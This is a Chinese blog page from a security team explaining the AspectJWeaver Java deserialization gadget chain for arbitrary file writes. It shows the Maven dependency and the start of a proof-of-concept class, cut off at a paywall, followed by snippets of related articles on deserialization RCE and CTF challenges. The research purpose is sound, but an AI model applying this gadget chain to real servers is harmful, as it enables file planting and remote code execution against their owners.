Sangfor华东天勇战队:AspectJWeaver反序列化利用链

最新推荐文章于 2025-11-29 14:22:46 发布
原创 最新推荐文章于 2025-11-29 14:22:46 发布 · 389 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #前端 #数据库

文章展示了如何通过Java反射技术调用AspectJ库中的私有内部类SimpleCache$StoreableCachingMap,结合CommonsCollections的LazyMap特性,构造特定的数据结构,利用BadAttributeValueExpException的反序列化过程触发文件写入操作。这个过程涉及到反射调用、内部类访问、序列化与反序列化的安全问题。

依赖:

<dependencies>
    <dependency>
        <groupId>org.aspectj</groupId>
        <artifactId>aspectjweaver</artifactId>
        <version>1.9.2</version>
     </dependency>
</dependencies>

测试类:

import java.lang.reflect.Constructor;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;

public class test {
   
   
    public static void main(String[] args) throws Exception{
   
   
        //反射获取构造函数
        Constructor con = Class.forName("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap").getDeclaredConstructor(String.class,int.class);
        con.setAccessible(true);
        //实例化对象
        HashMap map =  (HashMap)con.newInstance("D:",1);
        //调用其put方法
        map.pu
最低0.47元/天 解锁文章
番茄酱料
关注
AspectJWeaver反序列化
2301_79724395的博客
07-29 443
aspectjweaver中有一个SimpleCache类,SimpleCache类中的内部类StoreableCachingMap是一个继承HashMap的类。一眼顶真可以写文件,跟进writeToPath((String) key, valueBytes)文件路径就是folder + File.separator + key;那怎么触发put方法,如果有cc的依赖的话,看到我们的lazymap。其实没有什么好讲的,随便水一下,因为学过cc都知道了利用。懂的都懂了,也不需要我多说了。
D3CTF2021-non-RCE
feng的博客
03-07 4469
non-RCE 前言 去年D3CTF的题目,最近刚复现完国赛的那道Java,感觉出题的思路也是魔改的这题,所以来复现一下这题。 password绕过 不谈代码了,因为审完之后思路还是比较清晰的,就是利用JDBC对AsjpectJWeaver反序列化写文件到classpath然后反序列化rce。 第一重过滤是这个: public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterCha
[Java反序列化]AspectJWeaver反序列化
feng的博客
03-03 1963
[Java反序列化]AspectJWeaver反序列化 前言 2021年二月份ysoserialize增加了这条AspectJWeaver子,之后陆续在2021年的D3CTF以及国赛决赛中都出现了这条子的攻击,所以学习一下AspectJWeaver反序列化,之后再复现一下D3CTF和国赛决赛的两道Java。 依赖 <dependency> <groupId>commons-collections</groupId>
【Web】浅聊Java反序列化AspectJWeaver——任意文件写入
uuzeray的博客
03-10 2375
AspectJWeaver 是 AspectJ 框架的一部分,是一个用于实现面向切面编程(AOP)的工具。AspectJWeaver 提供了在 Java 程序中使用 AspectJ 的功能,并通过字节码操纵技术来织入切面代码到应用程序的目标类中。这篇文章不聊怎么任意利用文件写入进而来RCE,只学习一下如何利用AspectJWeaver通过反序列化来进行任意文件写入。
AspectJWeaver之Gadget分析
GalaxySpaceX的博客
12-28 1684
AspectJWeaver之Gadget分析
Hessian 反序列化及相关利用
晓得哥的博客
02-29 2539
作者:Longofo@知道创宇404实验室 时间:2020年2月20日 原文地址:https://paper.seebug.org/1131/#_2 前不久有一个关于Apache Dubbo Http反序列化的漏洞,本来是一个正常功能(通过正常调用抓包即可验证确实是正常功能而不是非预期的Post),通过Post传输序列化数据进行远程调用,但是如果Post传递恶意的序列化数据就能进行恶意利用。Apa...
Sangfor华东战队:h2数据库console命令执行( CVE-2021-42392 漏洞)
bring_coco的博客
06-26 1764
通过漏洞公布,可以看到是在org.h2.util.JdbcUtils.getConnection的javax.naming.Context出问题的。可以看到class javax.naming.InitialContext是javax.naming.Contex的子类,因此进入if。根据调用栈顺序,我们进入到org.h2.server.web.WebServer#getConnection方法,如下。进入org.h2.server.web.WebApp#process方法。
Sangfor华东战队:某咖啡还原密钥
bring_coco的博客
06-26 354
有很多子函数,我们先来看aes128_enc_wb_coff,aes128_enc_wb_xlc看看有没有走这里,老样子,还是先Interceptor.attach看看。原理:需要在倒数后两轮找的一个区间内,找的一个完整的地方插入,也就是第9轮,找的一个子函数,也就是wbShiftRows()进行故障的注入。多出来一块内容,前面是一样的,后面的是多出来的,pkcs7,前面填满了就会填充后面,填充进去会计算,那么我们还原的密钥是正确的。这里我们先要验证模式,虽然它写的是ecb命名,很有可能是欺骗我们。
Sangfor华东战队:jeecg-boot登录分析
bring_coco的博客
06-26 1169
这里checkcode取值为空,这是为什么呢,是因为redisUtil中没有获得,登录的时候会存到redis中,不可能获得不了,是因为超过了60s,redis中自动清除了key,那么这也就限制了登录的时间,一定程度防止了中间人攻击。这种加密方式具体算法我们不清楚,但是加密方法PasswordUtil.encrypt传入了三个参数用户名,密码,盐值,用户名密码都是登录处获得的,盐值是从数据库中拿到的,这里明显就是用户登录框输入账号密码,然后进行加密,与mysql数据库中的值进行比对。那么我们快速操作一次。
SANGFOR行为管理应用授权:WEB应用控制与安全
"该文档主要介绍了SANGFOR公司的AC(Access Control)和SG...通过这些功能,SANGFOR AC和SG能够帮助企业构建一个安全、高效且合规的网络环境,提高网络资源的利用率,保障企业信息安全,同时提升员工的工作效率。
Java安全之Dubbo反序列化漏洞分析
m0_65462541的博客
12-21 2321
0x00 前言 最近气冷,懒癌又犯了,加上各种项目使得本篇文断断续续。 0x01 Dubbo Dubbo是阿里巴巴开源的基于 Java 的高性能 RPC(一种远程调用) 分布式服务框架(SOA),致力于提供高性能和透明化的RPC远程服务调用方案,以及SOA服务治理方案。dubbo 支持多种序列化方式并且序列化是和协议相对应的。比如:Dubbo支持dubbo、rmi、hessian、http、webservice、thrift、redis等多种协议。 运行机制 Dubbo框架启动,容器Contai
dubbo kryo序列化_Hessian 反序列化及相关利用
weixin_26713059的博客
12-02 418
作者:Longofo@知道创宇404实验室时间:2020年2月20日前不久有一个关于Apache Dubbo Http反序列化的漏洞,本来是一个正常功能(通过正常调用抓包即可验证确实是正常功能而不是非预期的Post),通过Post传输序列化数据进行远程调用,但是如果Post传递恶意的序列化数据就能进行恶意利用。Apache Dubbo还支持很多协议,例如Dubbo(Dubbo Hessi...
序列化与反序列化之Parcelable和Serializable浅析
热门推荐
zejian的博客
09-26 2万+
转载请注明出处(万分感谢!): http://blog.csdn.net/javazejian/article/details/52665164 出自【zejian的博客】 本篇小部分内容摘自android开发艺术探索   在日常的应用开发中,我们可能需要让某些对象离开内存空间,存储到物理磁盘,以便长期保存,同时也能减少对内存的压力,而在需要时再将其从磁盘读取到内存,比如将某个特
MyBatis + PageHelper 分页内幕,PageHelper 是如何动态构建 LIMIT 分页 SQL 的
日常笔记 | 干货分享 | 毕设源码 | 毕设指导 | 答辩指导
11-26 946
若依系统中有很多的表格数据、后端接口实体中并没有看到有接收分页大小和页码的属性,在系统的mapper层面SQL语句中并没有看到对应的分页限制。它是如何实现这个分页效果的呢?是将所有的数据查询出来,然后再分页吗?这样效率岂不是非常低。带着这样的疑问,稍微研究了一下这个系统的分页方法。更多详细文章后端是通过从 HttpServletRequest 对象中获取分页的页码和大小,然后创建Page分页对象,在执行sql查询的时候,动态构建分页限制条件。从而实现分页,并不是在查询到所有数据之后再进行的分页处理。
【实战】项目traffic analysis技术点记录二
努力学习的!
11-28 606
主要是因为ClickHouse的DateTime类型精度只到秒级,不支持毫秒部分,而Java的LocalDateTime默认包含毫秒精度。(1) 服务提供者: 通过k8s Service 暴露出一组pod实例,并拥有一个稳定的DNS名称 : user-service.default.svc.cluster.local。这个注解的正确使用对于保证对象比较的正确性非常重要,特别是在使用HashSet、HashMap等集合时!轻量级,中心化的调度方案,依赖JobRunLock,同一任务实例互斥。
SpringBoot后端服务重定向
2509_94200968的博客
11-27 551
选择哪种方法取决于具体需求和架构。在我的场景中,使用了Spring MVC的重定向。但如果需要一个长期的解决方案,需要考虑前端同步更新,避免不必要的重定向的开销。或者使用反向代理或者Spring Cloud Gateway。愿你我都能在各自的领域里不断成长,敢追求梦想,同时也保持对世界的好奇与善意!
Docker:基于自制openjdk8镜像 or 官方openjdk8镜像,制作tomcat镜像
最新发布
2509_94186151的博客
11-29 325
78.56 MBopenjdk二进制下载地址Dockerfile中,source /etc/profile不能加载的原因为什么还需要选择使用他的原因:三 中,tomcat普通用户交互式启动tomcat#在 Docker 容器中,/etc/profile 文件不会在容器启动时自动执行,这是因为 Docker 容器通常不会启动交互式登录 shell,而是直接运行指定的命令。
Springboot | Spring Boot 3 纯 JDBC 实现宠物管理系统增删改查(无 ORM 框架)
张较瘦
11-24 1170
本文介绍了基于Spring Boot 3和纯JDBC实现的宠物管理系统CRUD操作。通过原生JDBC方式,不使用任何ORM框架,帮助开发者深入理解底层数据库操作原理。文章详细说明了环境准备(JDK17+、Spring Boot 3.2.x、MySQL 8.0)、项目依赖配置、数据库连接设置以及表结构创建。核心实现包括:Pet实体类定义(包含id、name、breed和age字段)以及PetService服务层,利用JdbcTemplate封装增删改查操作,重点演示了如何通过PreparedStatement
Fastjson 反序列化漏洞深度解析:从原理到实战防护
qq_40448670的博客
11-25 957
作为 Java 生态中最常用的 JSON 解析库之一,Fastjson 因高性能被广泛应用于各类系统。但它的反序列化漏洞(尤其是 CVE-2022-25845)曾多次引发大规模安全事件 —— 攻击者只需构造恶意 JSON 字符串,就能实现远程代码执行(RCE),直接控制服务器。本文将从漏洞原理切入,结合实战案例拆解各版本绕过技巧,最终给出企业级防护方案,帮你彻底规避风险。Fastjson 的反序列化漏洞本质是。该机制原本用于方便还原复杂对象类型,却被攻击利用来加载恶意类,触发危险操作。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值